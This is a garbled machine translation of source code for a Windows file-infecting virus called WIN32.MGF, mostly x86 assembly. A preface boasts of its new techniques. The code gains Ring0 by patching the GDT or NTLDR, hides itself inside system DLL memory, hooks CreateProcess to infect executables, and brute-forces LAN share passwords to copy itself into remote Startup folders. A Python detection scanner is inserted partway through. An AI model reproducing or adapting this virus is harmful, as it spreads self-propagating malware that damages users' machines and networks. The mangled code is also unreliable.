"Mo National Defense" Virus (WIN32.MGF) source procedure
Warning: This program is for study and research only. It is not permitted to modify it into a new variant of the virus, nor to add destructive code to it. Remember that!

Purpose:
1. To pay respects to Chen Yinghao, and to pit this virus against CIH.
2. To exchange techniques and raise the level of the country (if you read the source and trace the virus, your skill will improve).
3. To let the world know that China is still there.

Related techniques:
1. Entering Ring0: under Win98 a call gate is added directly to the GDT; under Windows 2000/XP/2003 the call gate is written into NTLDR and takes effect after a reboot (original technique; this is also a vulnerability of Windows 2000/XP/2003).
2. Memory residence: every DLL module, once loaded into memory, uses only 1K of its file header and leaves 3K of space, so the virus puts 3K of itself into the gap of kernel32.dll and the remaining 2K into user32.dll. Win98 is a special case: there the 2K goes into a page allocated with the VxD service _PageAllocate. The virus does not reside in the conventional way (as a process or in GlobalAlloc memory) but is inserted into the module gaps, so it is not easily noticed and the in-memory copy is hard to remove. Many anti-virus products either cannot find this virus at all, or find it but cannot kill it or cannot remove it cleanly, and are powerless against it (original technique).
4. LAN propagation: cracks the remote host's share password with its own password generator, then copies the virus into the other side's Startup folder.
5. E-mail propagation: oh, there is no such function at present!

Hazard estimate:
1. Affects the normal operation of the infected machine.
2. [start of item missing] operation (go ask Bill Gates: who told him to give you an MPR that can't take the load?).
3. There is absolutely no damaging of data, overwriting of the BIOS, theft of information, or other malicious behaviour.

Technology keeps improving; perhaps a more powerful virus will come along, heh heh.
.586p.model flat, stdcalloption casemap: None
INCLUDE Windows.Include kernel32.incinclude user32.incinclude advapi32.include mpr.incincludelib kernel32.libincludelib user32.libludelib advapi32.libincludelib mpr.lib
VirusSize = VirusEnd-offset VirusStartVirusSizeP1 = offset _OtherMemPosition-offset VirusStart offset; IBDV VirusSizeP2 = VirusSize-VirusSizeP1 infected PE file memory portion; the second half of this toxic, inactive .codeVirusStart: noppushfdpushad
DB 0E8H, 0, 0, 0; this is a call command, which is equivalent to the Push Eippop EBX; EBX = EBX instructions in memory actual address MOV EDX, EBXMOV EBXSUB EBX, $ - 5; actual address - Design address = address difference = replacement value = EbxSub EDX, 8Call _getmoduleAddress; get the loading address of this process Add Eax, [EBX 3CH] MOV LPOLDPE [EBX], EAXSUB EDX, [EAX 28h] Sub Edx, [EAX 34h] add virusexit [ebx], edx; edx = repositioning value of this process, correct the original program entry
Mov Eax, [ESP 24h] Call_getmoduleaddress; get hkernel32mov hkernel32 [ebx], EAXMOV CALLGATESEL [EBX], 103H
Call_getc3address; find the address of RET (0xc3) in the kernel32.dll module
lea esi, [ebx FunctionNameTab 8]; first obtain LoadLibraryA, GetProcAddress, GetVersion address lea edi, FunctionAddressTab [ebx] mov ecx, 3 @@: lodsdadd eax, ebxpush eaxpush hKernel32 [ebx] call _GetProcAddressstosdloop @b
Call dwgetversion [EBX] SHR EAX, 31MOV DWVERSION [EBX], EAX; Windows version is put in dWVersion variable, 98 = 1, 2000 / xp / 2003 = 0
Call _ISwindows9x; if Win98 is immediately added to GDT to add Callgate
LEA ESI, [EBX FunctionNameTab 4 * 7] MOV ECX, 4 @@: lodsdadd EAX, EBX.IF DWVERSION [EBX] MOV BYTE PTR [EAX-2], 'a'.elsemov Byte PTR [EAX-2] , 'W'..ndifloop @B; process ANSI / UNICODE API function name
Call _ProcessimportTab; import all API functions
Lea Eax, Szuser32 [EBX] Push EaxCall DwloadLibrary [EBX] MOV HUSER32 [EBX], EAX
XOR edx, edxlar edx, callgatesel [ebx] .IF DH! = 0ech; if it is the first infection of 2000 / XP / 2003, write CallGate into NTLDR, infecting the desktop's shortcuts corresponding to the EXE file, waiting to restart the CallGate take effect
Push 4LEA Eax, SZNTLDR [EBX] Push EaxCall_Editfile
Call_Editlnkfile
.ELSE; if it is a 2000 / XP / 2003 in Win98 or memory, enter Ring0DW 9BffHDD Offset CallgateSel-4MOV EAX, Espmov ESP, [ESP 4]; Switch Stack Push Eaxmov Eax, CR0BTR EAX, 16MOV CR0, EAX Remove the Keernel32 module read-only memory page write protection
MOV EAX, LPOLDPE [EBX] MOV EDX, DWOLDENTRY [EBX] MOV [EAX 28H], EDXMOV EDX, DWOLDIMAGE [EBX] MOV [EAX 50H], EDX; Recovery Process Inlet and Image Size, Action Some Programs Self-protection
MOV EDI, HKERNEL32 [EBX] Add Edi, [EDI 3CH] MOV EDI, [EDI 54H] Add Edi, Hkernel32 [EBX] MOV LPMEMPSITION1 [EBX], Edilea ESI, VirusStart [EBX] MOV ECX, 10HREPZ CMPSB; Judgment Whether the virus is already in memory
.IF! ZERO?; NOT IN MEM.IF DWVERSION [EBX]; Not in memory push 0fhpush 0push -1push 0push 0push 0push 1push 1 @@: int 20h; vxd -> _ PageAllocatedd 00010053hadd ESP, 8 * 4le EDI, @ b [ebx ] MOV WORD PTR [EDI], 20CDHMOV DWORD PTR [EDI 2], 00010053H.ELSEMOV EAX, HUSER32 [EBX] Add Eax, [EAX 3CH] MOV EAX, [EAX 54H] Add Eax, HUSER32 [EBX]; 2000 / XP / 2003 --- "EAX = USER32.DLL module voids .Endifmov lpMemPosition2 [EBX], EAX
MOV EDI, LPMEMPSITION1 [EBX] Add Edi, Offset_BeforeApi-Offset VirusStartmov DWORD PTR [EBX SZNewcommand 1], EDI; Construction Jump Transfer to the command of the CreateProcess interception function
Mov ESI, DWCREATEPROCESS [EBX] Push Esilea EDI, SZOLDCOMMAND [EBX] MOV ECX, 6REP MOVSB; saving the top 6 bytes of CREATEPROCESS functions
Lea ESI, SZNewcommand [EBX] Pop Edimov ECX, 6Rep Movsb; Transform the first instruction of the CreateProcess function to jump into the intercept function
Lea ESI, VirusStart [EBX] MOV EDI, LPMEMPSITION1 [EBX] MOV ECX, VirussizeP1Rep Movsb; Front 3K Residence in Kernel32 Module
Mov EDI, Eaxmov ECX, VirussizeP2Rep Movsb; 2K after virus resides in the user32 module or vxd _pageallocate points to the page .enDIF
POP Esplea Eax, @ f [EBX] Push EaxRetf; return @@:
.endif
; Create thread for net taint.if dwVersion [ebx]; create infection LAN threads call _MemToFilelea eax, dwVersion [ebx] push eaxpush 0push 0lea eax, _GoLAN [ebx] push eaxpush 0push 0call dwCreateThread [ebx] .endif
ENTER 32, 0; Judgment Site Conditions Push EspCall Dwgetlocaltime [EBX] MOV AX, [ESP 2] MOV DL, 3DIV DL.IF AH == 0 && Word PTR [ESP 4]> = 5push 0le Eax, SzmessageTit [EBX ] Push Eaxle Eax, SzmeSsageText [EBX] Push Eaxpush 0Call DwMessageBox [EBX] .EndifleavePopadPOPFD
DB 68HVIRUSEXIT: DD OFFSET @f; if the virus returns the original program entry, return the control right to the original program; if the virus runs independently, @@:; Go back to the kernel32.dll module, exit the virus process (advanced skills, do not rely on EXITPROCESS). RET
Hkernel32 DD 0HUSER32 DD 0SZUSER32 DB 'USER32.DLL', 0
DWC3ADDRESS DD 0
DwoldImage DD 3000HDWoldentry DD 1000 HLPoldpe DD 0lpMemPosition1 DD 0lpMemPosition2 DD 0
DWVERSION DD 0CALLGATESEL DD 103H
Intercepting the first half of CreateProcess, mainly determined that the previous 6-byte of the original function is restored to ensure CREATEPROCESS; return to the second half of the intercepting function _beforeforeapi: pushfd; extend the stack space, the second half of the block Address Pushfd; Extended Stack Space, CreateProcess's Parameter Top 4 Byte Used Space Pushfd; Save Site PushadCLD
DB 0e8H, 0, 0, 0; Push Eippop EbxSub EBX, $ - 1; EBX = Relocation Value
MOV EDI, DWCREATEPROCESS [EBX] MOV [ESP 24h], Edilea ESI, SzoldCommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSB; enter Ring0 Restore CreateProcess's first 6 bytes of Lea Eax, @ f [ebx] PUSH EaxRetf @@:
MOV EAX, LPMEMPSITION1 [EBX] add eax, offset _behindapi-offset virusstartXCHG EAX, [ESP 2CH]; call the code of the CREATEPROCESS function to return the address, exchange the address of the intercepting function
Lea ESI, [ESP 2CH] Lea EDI, [ESP 28H] MOV ECX, 11REP MOVSDSTOSD; 10 parameters of the CreateProcess function move 4 bytes, and finally returned the address to the stack
MOV ESI, [ESP 28H 4]; the path to the EXE file. IF! ESIMOV ESI, [ESP 28H 4 4] .endif
ENTER 100H, 0xOR Eax, Eaxmov ECX, 100HLA EDI, [EBP-100H] Rep Stosb
XOR EDX, EDXLEA EDI, [EBP-100H] MOV ECX, 80H @@ :. if dwversion [ebx]
Lodsb.if al == 0stosbmov DL, 2.ELSEIF AL == 22Hinc Edx.elsestosb.Endif
.lse
Lodsw.if AX == 0stoswmov DL, 2.ELSEIF AX == 22 Hinc Edx.elsestosw.endif.Endif
CMP DL, 2LOOPNZ @B
.IF dwversion [EBX] Lea ESI, [EBP-100H 2] .elselea ESI, [EBP-100H 4] .ndifmov ECX, 4 @@ :. if dwversion [EBX] Lodsb.elselodsw.Endifshrd Edx, Eax, 8LOOP @BAND EDX, 0DFDFDFDFH; lowercase switch CMP EDX, 'niw /' jz @ f.if! Dwversion [ebx] && edx == 'ORP /' JMP @ F.Endif
Lea Edx, [EBP-100H]
Push 1Push Edxcall_Editfile; Infecting CreateProcess opened PE file
@@: LeavePopadPOPFDRET; Back to the original CreateProcess continues to execute
_Behindapi:; CREATEPROCESS will be jumped here, here is responsible for restoring its first 6 bytes as jump instructions, jump to the first half of the blocking function PushfdpushadCld
DB 0E8H, 0, 0, 0, 0POP EBXSUB EBX, $ - 1
Mov EDI, DWCREATEPROCESS [EBX] Lea ESI, SZNewcommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSBLEA EAX, @ f [EBX] Push EaxRetf @@:
PopadPopfdret; here really returning to CreateProcess address SzoldCommand DB 6 DUP (0) Sznewcommand DB 68H, 0, 0, 0, 0, 0C3HDB 0
Infecting the subprogram of the PE document; _dwflag ----- bit 0: 0 = NTLDR, 1 = pe; bit 1: 0 = MEM, 1 = file; bit 2: 0 = auto (ANSI / Unicode), 1 = ansi_EditFile proc _lpFileName, _dwFlaglocal @hFilelocal @hFileMaplocal @lpFileMaplocal @dwFileSizelocal @dwFileAttributeslocal @ stFileTime1: FILETIMElocal @ stFileTime2: FILETIMElocal @ stFileTime3: FILETIMEpushad
push _lpFileNamebt _dwFlag, 2.if CARRY call dwGetFileAttributesA [ebx] .elsecall dwGetFileAttributes [ebx] .endif; invoke GetFileAttributes, _lpFileName.if eax = - 1mov @ dwFileAttributes, eax?!
Push 80HPUSH _LPFILENAMEBT _DWFLAG, 2.IF Carry? Call DWsetFileAttributesa [EBX] .lsecall dwsetfileAttributes [EBX] .endif; Invoke setFileAttributes, _lpfilename, 80h
push 0push 80hpush 3push 0push 3push 0c0000000hpush _lpFileNamebt _dwFlag, 2.if CARRY call dwCreateFileA [ebx] .elsecall dwCreateFile [ebx] .endif;? invoke CreateFile, _lpFileName, 0c0000000h, 0,0,3,80h, 0.if eax =! 0FFFFFFFHMOV @ Hfile, Eaxpush EaxCall DwgetFileType [EBX] .IF EAX == file_type_disk
Push 0push @HfileCall DwgetFilesize [EBX]; Invoke getFileSize, @ hfile, 0mov @ dwfilesize, EAX
lea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwGetFileTime [ebx]; invoke GetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2, addr @ stFileTime3
Push 0push 0push 0push 4push 0push @HfileCall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, @ Hfile, 0, 4, 0, Eax, 0.if Eaxmov @ HfileMap, EAX
Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX
Bt _dwflag, 0.if carry? .if Word PTR [EAX] == 'zm'.if DWORD PTR [EAX 20H]! =' fgm'add Eax, [EAX 3CH] .IF DWORD PTR [EAX] = = 'EP'BT DWORD PTR [EAX 16H], 13.IF! Carry?
Push @lpfilemapcall dwunmapviewoffile [ebx]
Push @HfilemapCall DWCloseHandle [EBX]
Mov Eax, @ dwfilesizeadd eax, virussize; if it is a PE file that meets the condition, file size extension Virussize bytes
Push 0push eaxpush 0push 4push 0push @HfileCall dwcreatefilemapping [EBX] MOV @ HFILEMAP, EAX
Push 0push 0push 0push 6push eaxcall dwmapviewoffile [EBX] MOV @ lpfilemap, EAX
Add Eax, [EAX 3CH] MOVZX ECX, Word PTR [EAX 6] DEC ECXXCHG EAX, ECXMOV EDX, 28HMUL EDXCHG EAX, ECXMOVZX EDX, WORD PTR [EAX 14H] Add Edx, 18HADD EDX, EaxAdd Edx, ECX; Positioning in the last section
mov edi, @ lpFileMapadd edi, @ dwFileSizebt _dwFlag, 1.if CARRY? lea esi, VirusStart [ebx] mov ecx, VirusSizepushadrep movsbpopad.elsemov esi, lpMemPosition1 [ebx] mov ecx, VirusSizeP1pushadrep movsb.if dwVersion [ebx] mov esi, lpMemPosition2 [ebx] .elselea eax, szUser32 [ebx] push eaxcall dwLoadLibrary [ebx] mov esi, eaxadd esi, [esi 3ch] mov esi, [esi 54h] add esi, eax.endifmov ecx, VirusSizeP2rep movsbpopad.endif; Write the virus code into file MOV ECX, @ dwfilesizeadd ecx, virussizesub ECX, [EDX 14H] MOV [EDX 8], ECXMOV [EDX 10H], ECXMOV DWORD PTR [EDX 24H], 0E00000E0HMOV ECX, [EAX 50h] mov esi, offset dwOldImage-offset VirusStartmov [edi esi], ecxmov ecx, [eax 28h] mov esi, offset dwOldEntry-offset VirusStartmov [edi esi], ecxadd ecx, [eax 34h] mov esi, offset Virusexit-Offset VirusStartmov [EDI ESI], ECXSUB EDI, @ lpfilemapsub EDI, [EDX 14H] Add EDI, [EDX 12] MOV [EAX 28H], Edimov ECX, [EDX 12] Add ECX, [EDX 8] and cx, 0f000hadd ECX, 1000HMOV [EAX 50H], ECXMOV ECX, @ lpfilemapmov DWORD PTR [ECX 20H], 'FGM'; modify PE file header and write infected sign MGF
.endif; 'DLL'
.endif; 'EP'
.endif ;! 'fgm'
.endif; 'zm'
.else; _dwFlag; if it is NTLDR file, write CALLGATElea esi, szGdtData [ebx] mov edi, @ lpFileMapmov ecx, @ dwFileSize @@: inc edipush esipush edipush ecxmov ecx, 10hrepz cmpsbpop ecxpop edipop esiloopnz @b
. IF ZERO? XOR EAX, Eaxmov ECX, 80H @@: Sub EDI, 8PUSH EDIPUSH ECXMOV ECX, 8REPZ ScaSBPOP ECXPOP EdiloOPnz @B
.IF ZERO? Add Edi, 100HLEA ESI, SZCallgate [EBX] MOV ECX, 10HREP MOVSB
MOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI-16], DXSHR EDX, 16MOV Word PTR [EDI-10], DX.Endif
.endif
.ndif; _dwflag
Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif
push @hFileMapcall dwCloseHandle [ebx]; invoke CloseHandle, @ hFileMap.endiflea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwSetFileTime [ebx]; invoke SetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2 Addr @ stfiletime3.endif
Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif
push @dwFileAttributespush _lpFileNamebt _dwFlag, 2.if CARRY call dwSetFileAttributesA [ebx] .elsecall dwSetFileAttributes [ebx] .endif;? call dwSetFileAttributes [ebx]; invoke SetFileAttributes, _lpFileName, @ dwFileAttributes.endif
POPADRET_EDITFILE ENDP
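As an added defender-side example (not part of the virus listing above), here is a Python scanner that checks a PE file for the traces the _EditFile routine leaves behind: the "MGF" marker at DOS header offset 20h, the last section's characteristics set to 0E00000E0h, and the entry point redirected into that last section. The tiny PE it builds for demonstration is constructed test data, not a real binary.

```python
import struct

MGF_MARKER = b"MGF\x00"          # the DWORD the infector writes at DOS header offset 0x20
MGF_SECTION_FLAGS = 0xE00000E0   # value the infector stores in the last section's Characteristics
IMAGE_FILE_DLL = 0x2000          # bit 13 of FileHeader.Characteristics; the infector skips DLLs


def parse_pe(data):
    """Minimal PE reader: returns only the header fields the MGF checks depend on."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    nsect, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, chars = struct.unpack_from("<HH", data, e_lfanew + 0x14)
    entry, = struct.unpack_from("<I", data, e_lfanew + 0x28)   # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        off = e_lfanew + 0x18 + opt_size + i * 0x28
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        flags, = struct.unpack_from("<I", data, off + 0x24)
        sections.append({"name": name.rstrip(b"\x00"), "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr, "flags": flags})
    return {"marker": data[0x20:0x24], "entry": entry,
            "is_dll": bool(chars & IMAGE_FILE_DLL), "sections": sections}


def mgf_indicators(data):
    """Return the list of MGF infection indicators found in a PE image (empty = clean)."""
    pe = parse_pe(data)
    hits = []
    if pe["marker"] == MGF_MARKER:
        hits.append("marker 'MGF' at DOS header offset 0x20")
    last = pe["sections"][-1]
    if last["flags"] == MGF_SECTION_FLAGS:
        hits.append("last section characteristics 0xE00000E0 (code+data, RWX)")
    if last["vaddr"] <= pe["entry"] < last["vaddr"] + max(last["vsize"], last["rawsize"]):
        hits.append("entry point 0x%X lies inside last section %r" % (pe["entry"], last["name"]))
    return hits


def build_sample(infected):
    """Construct a tiny two-section PE32 (constructed test data, not a real binary).
    With infected=True the headers are altered the same way _EditFile alters them."""
    e_lfanew, opt_size, virus_size = 0x80, 0xE0, 0x1400
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    # COFF header: i386, 2 sections, no symbols, PE32 optional header, EXE (not DLL)
    struct.pack_into("<HHIIIHH", hdr, e_lfanew + 4, 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = e_lfanew + 0x18
    struct.pack_into("<H", hdr, opt, 0x10B)             # PE32 magic
    struct.pack_into("<I", hdr, opt + 0x1C, 0x400000)   # ImageBase
    struct.pack_into("<I", hdr, opt + 0x38, 0x3000)     # SizeOfImage
    text = (b".text", 0x200, 0x1000, 0x200, 0x200, 0x60000020)
    data = [b".data", 0x100, 0x2000, 0x200, 0x400, 0xC0000040]
    body = b"\xC3" * 0x200 + b"\x00" * 0x200
    entry = 0x1000
    if infected:
        hdr[0x20:0x24] = MGF_MARKER
        entry = len(hdr) + len(body) - data[4] + data[2]  # RVA of code appended at end of file
        data[1] = data[3] = len(hdr) + len(body) + virus_size - data[4]  # grow last section
        data[5] = MGF_SECTION_FLAGS
        body += b"\xCC" * virus_size                      # stand-in for the appended body
        struct.pack_into("<I", hdr, opt + 0x38, (data[2] + data[1] + 0xFFF) & ~0xFFF)
    struct.pack_into("<I", hdr, opt + 0x10, entry)
    for i, s in enumerate((text, tuple(data))):
        off = opt + opt_size + i * 0x28
        struct.pack_into("<8sIIIIIIHHI", hdr, off, s[0], s[1], s[2], s[3], s[4], 0, 0, 0, 0, s[5])
    return bytes(hdr) + body


if __name__ == "__main__":
    print("clean   :", mgf_indicators(build_sample(False)))
    print("infected:", mgf_indicators(build_sample(True)))
```

Any one indicator alone is weak (packers also produce RWX last sections with the entry point inside), so treat the three together, with the DOS-header marker as the decisive one.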
Szgdtdata DW 0FFFH, 0000, 9A00H, 00cfh, 0FFFH, 0000, 9200H, 00CFHSZCallgate DW 0000, 0108H, 0EC00H, 0000, 0FFFH, 0000, 9A00H, 00cfh
SZNTLDR DB 'C: / NTLDR', 0
The getProcadDress function, usage and kernel32.dll's getProcaddress _GetProcaddress proc buy ES ESI EDI, _HModule, _lpszprocnamelocal @dwsize
Mov Edx, _HModuleAdd Edx, [EDX 3CH] MOV EDX, [EDX 78H] Add Edx, _HModuleMov ECX, [EDX 18H] MOV ESI, [EDX 20H] MOV EDI, _LPSZPROCNAME
Push EDIPUSH ECXXOR EAX, EAXMOV ECX, 0FFFFFFFHREPNZ ScaSBNOT ECXDEC ECXMOV @ dwsize, ECX; Calculation Function Name Length POP ECXPOP EDI
Add ESI, _HModule @@: Push Edipush ECXMOV ECX, @ DWSELODSDADD EAX, _HModulexchg Eax, ESIREPZ CMPSBXCHG EAX, ESI Pop EcxPop EdiloPnz @B
.IF! ZERO? xor Eax, EaxRet.endif
Sub ESI, _HModulesub ESI, 4SUB ESI, [EDX 20H] SHR ESI, 1Add ESI, [EDX 24h] Add ESI, _HModuleLodsdmovzx ESI, AXSHL Eax, 2AX, [EDX 1CH] Add Eax, _HModuleMov Edx, [EAX ] add edx, _hmodulexchg Edx, EAX
RET_GETPROCADDRESS ENDP
Words of the LAN _Golan Proc Lparamlocal @Henumlocal @dwcountlocal @szResourceName [32]: Bytelocal @szbuffer [0C00H]: Bytepushad
DB 0E8H, 0, 0, 0POP EBXSUB EBX, $ - 1LEA EAX, @ Henumbush Eaxpush 0push 13hpush 0push 5call dwwnetopENENUM [EBX]
.if! eax.repeatmov @ dwcCount, -1lea eax, dwBufferSize [ebx] push eaxlea eax, @ szBufferpush eaxlea eax, @ dwcCountpush eaxpush @hEnumcall dwWNetEnumResource [ebx] cmp dword ptr [@ szBuffer 14h], 0jnz @ f.until Eaxpush @henumcall dwwnetcloseenum [ebx] .endifjmp _golaanexit
@@: push @henumcall dwwnetcloseenum [EBX] Lea EDI, @ szbuffer
_Nextpc: Push Edimov ESI, [EDI 14H] Lea EDI, @ SzResourceName @@: lodsbstosbor al, aljnz @BMOV DWORD PTR [EDI-1], 'C /' Pop Edi
XOR Eax, Eaxmov DWPassword [EBX], EAX
@@: lea edx, szlocaldrive [ebx] Push Edxpush EaxLea EDX, @ SzResourceNamepush EDXCALL DWNETADCONNECTION [EBX] .IF EAX == 56HCALL _GENPASSWORDCMP DWPASSWORD [EBX], 0JNZ @ B.ELSEIF! EAX
Push 0le Eax, Szdfile [EBX] Push Eaxlea Eax, Szsfile [EBX] Push EaxCall DwcopyFile [EBX]; If you find writable sharing, infecting MOV ESI, EAX
Push 1LEA Eax, Szlocaldrive [EBX] Push EaxCall Dwwnetcancelconnection [EBX] Call _genpasswordor ESI, ESIJZ @B
.endif
Add Edi, 20HDEC @dwccountjnz _nextpc
_Golanexit: popad_golan endp
SzmemTofilename DB 'UNBLASTER.EXE', 0SZSFILE DB 'C: /WINDOWS/SYSTEM/UNBLASTER.EXE', 0SZDFILE DB 'X: / Windows / All Users / Start Menu / Programs / Start /unblaster.exe' ,0
DWPassword DD 0DD 0, 0Szpassword DB 0SzlocalDrive DB 'x:', 0DWBuffersize DD 0C00H
_Genpassword:; generated subroutine, password includes 1234567890! @ # $% ^ Character STD
Pushadlea EDI, [EBX SZPassword-1] xor Edx, Edxmov Eax, Dwpassword [EBX] MOV ECX, 16
@@: div ECXXCHG EAX, EDX.IF AL <= 5ADD Al, 21h.ELSE; if Al> = 6 && Al <= 15ADD Al, 2AH.Endifstosbxor Eax, Eaxxchg Eax, Edxor Eax, Eaxjnz @B
Inc Ediinc DWPassword [EBX] MOV [ESP 20H-4], EDIPOPADCLDRET
_MEMTOFILE PROC; restore virus itself subroutine local @hfilelocal @Hfilemaplocal @lpfilemaplocal @lpsystemdir [40h]: Byte
push 40hlea edi, @ lpSystemDirpush edicall dwGetSystemDirectory [ebx]; invoke GetSystemDirectory, addr @ lpSystemDir, 100hadd edi, eaxmov al, '/' stosblea esi, szMemToFileName [ebx] mov ecx, 16rep movsb
push 0push 80hpush 2push 0push 0push 0c0000000hlea eax, @ lpSystemDirpush eaxcall dwCreateFileA [ebx];! invoke CreateFile, addr @ lpSystemDir, 0c0000000h, 0,0,2,80h, 0.if eax = 0ffffffffhmov @ hFile, eax
Mov Edx, VirussizeAdd Edx, 200h
Push 0PUSH EDXPUSH 0PUSH 4PUSH 0PUSH EaxCall dwcreatefilemapping [EBX]; Invoke CreateFileMapping, Eax, 0, 4, 0, EDX, 0.IF Eaxmov @ HfileMap, EAX
Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX
Mov EDI, ESMOV ESI, Hkernel32 [EBX] MOV ECX, 0A8HREP MOVSB; with Kernel32 DOS head MOV DWORD PTR [EAX 3CH], 0A8HMOV DWORD PTR [EAX 20H], 'Fgm'lea ESI, FileHead [EBX] MOV ecx, 120hrep movsb; original PE header xor eax, eaxmov ecx, 38hrep stosblea esi, VirusStart [ebx] mov ecx, VirusSizepush edirep movsb; virus code pop edimov esi, offset VirusExit-offset VirusStartmov dword ptr [edi esi], offset VirusExit 4
Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif
Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif
Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif
RET_MEMTOFILE ENDP
_ProcessimportTab:; Handmade Import Functions Lea ESI, FunctionNameTab [EBX] Lea Edi, FunctionAddresStab [EBX] @@: Lodsd
.IF EAX == 0ffffffffhlodsdadd Eax, EBXPUSH EAXCALL DWLOADLIBRARY [EBX] MOV ECX, EAX
.ELSEIF EAXADD EAX, EBXPUSH ECXPUSH EAXPUSH ECXCALL DWGETPROCADDRESS [EBX] Stosdpop Ecx.Endifor Eax, Eaxjnz @B
RET
_ISWINDOWS9X:; Add Callgate subroutine to Win98. IF! ZERO?; WIN9XXOR ECX, ECXPUSH ECXPUSH CXSGDT FWORD PTR [ESP] POP CXPOP EDISUB ECX, 8and CL, 0F8hor Cl, 3MOV Callgatesel [EBX], ECX
XOR EDX, EDXLAR EDX, ECX
.IF DH! = 0echand CL, 0F8HMOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI ECX], DXSHR EDX, 16MOV Word PTR [EDI ECX 6], DXMOV DWORD PTR [EDI ECX 2], 0ec000028h .endif
.endifret
_Getmoduleaddress: @@: and ax, 0f000HSUB EAX, 1000HCMP WORD PTR [EAX], 'zm'jnz @BMOV ECX, EaxAdd ECX, [ECX 3CH] CMP DWORD PTR [ECX],' ep'jnz @bret
_Getc3address: Mov Edi, Hkernel32 [EBX] Add Edi, 1000HMOV ECX, 20000HMOV AL, 0C3HCLDREPNZ ScaSBDEC Edimov DWC3ADDRESS [EBX], EDIRET
FunctionAddressTab: dwLoadLibrary dd 0dwGetProcAddress dd 0dwGetVersion dd 0dwCloseHandle dd 0dwCreateProcess dd 0dwCreateFile dd 0dwGetFileAttributes dd 0dwSetFileAttributes dd 0dwCreateFileA dd 0dwGetFileAttributesA dd 0dwSetFileAttributesA dd 0dwGetSystemDirectory dd 0dwCreateFileMapping dd 0dwCreateThread dd 0dwGetFileSize dd 0dwGetFileTime dd 0dwSetFileTime dd 0dwGetFileType dd 0dwGetLocalTime dd 0dwCopyFile dd 0dwMapViewOfFile dd 0dwUnmapViewOfFile dd 0dwFindFirstFile dd 0dwFindNextFile dd 0dwFindClose dd 0dwMessageBox dd 0dwRegCloseKey dd 0dwRegCreateKeyEx dd 0dwRegOpenKeyEx dd 0dwRegQueryValueEx dd 0dwRegSetValueEx dd 0dwWNetAddConnection dd 0dwWNetCancelConnection dd 0dwWNetCloseEnum dd 0dwWNetEnumResource dd 0dwWNetOpenEnum dd 0
_Thermemposition:; 2K in the second half of elsewhere
FunctionNameTab: dd 0ffffffffhdd offset szKernel32dd offset szLoadLibraryAdd offset szGetProcAddressdd offset szGetVersiondd offset szCloseHandledd offset szCreateProcessdd offset szCreateFiledd offset szGetFileAttributesdd offset szSetFileAttributesdd offset szCreateFileAdd offset szGetFileAttributesAdd offset szSetFileAttributesAdd offset szGetSystemDirectoryAdd offset szCreateFileMappingAdd offset szCreateThreaddd offset szGetFileSizedd offset szGetFileTimedd offset szSetFileTimedd offset szGetFileTypedd offset szGetLocalTimedd offset szCopyFileAdd offset szMapViewOfFiledd offset szUnmapViewOfFiledd offset szFindFirstFileAdd offset szFindNextFileAdd offset szFindClosedd 0ffffffffhdd offset szUser32dd offset szMessageBoxAdd 0ffffffffhdd offset szADVAPI32dd offset szRegCloseKeydd offset szRegCreateKeyExAdd offset szRegOpenKeyExAdd offset szRegQueryValueExAdd offset szRegSetValueExAdd 0ffffffffhdd offset szMPRdd offset szWNetAddConnectionAdd offset szWNetCancelConnectionAdd offset szWNe TcloseEnumdd Offset SzwneetenumResourceAdd Offset SzwNetopeNenumAdd 0
szKernel32 db 'kernel32.dll', 0szLoadLibraryA db 'LoadLibraryA', 0szGetProcAddress db 'GetProcAddress', 0szGetVersion db 'GetVersion', 0szCloseHandle db 'CloseHandle', 0szCreateProcess db 'CreateProcessW', 0szCreateFile db 'CreateFileW', 0szGetFileAttributes db 'GetFileAttributesW', 0szSetFileAttributes db 'SetFileAttributesW', 0szCreateFileA db 'CreateFileA', 0szGetFileAttributesA db 'GetFileAttributesA', 0szSetFileAttributesA db 'SetFileAttributesA', 0szGetSystemDirectoryA db 'GetSystemDirectoryA', 0szCreateFileMappingA db 'CreateFileMappingA', 0szCreateThread db 'CreateThread', 0szGetFileSize db 'GetFileSize', 0szGetFileTime db 'GetFileTime', 0szSetFileTime db 'SetFileTime', 0szGetFileType db 'GetFileType', 0szGetLocalTime db 'GetLocalTime', 0szCopyFileA db 'CopyFileA', 0szMapViewOfFile db 'MapViewOfFile', 0szUnmapViewOfFile db 'UnmapViewOfFile', 0szFindFirstFileA db 'FindFirstFileA', 0szFindNextFileA db 'FindNextFileA ', 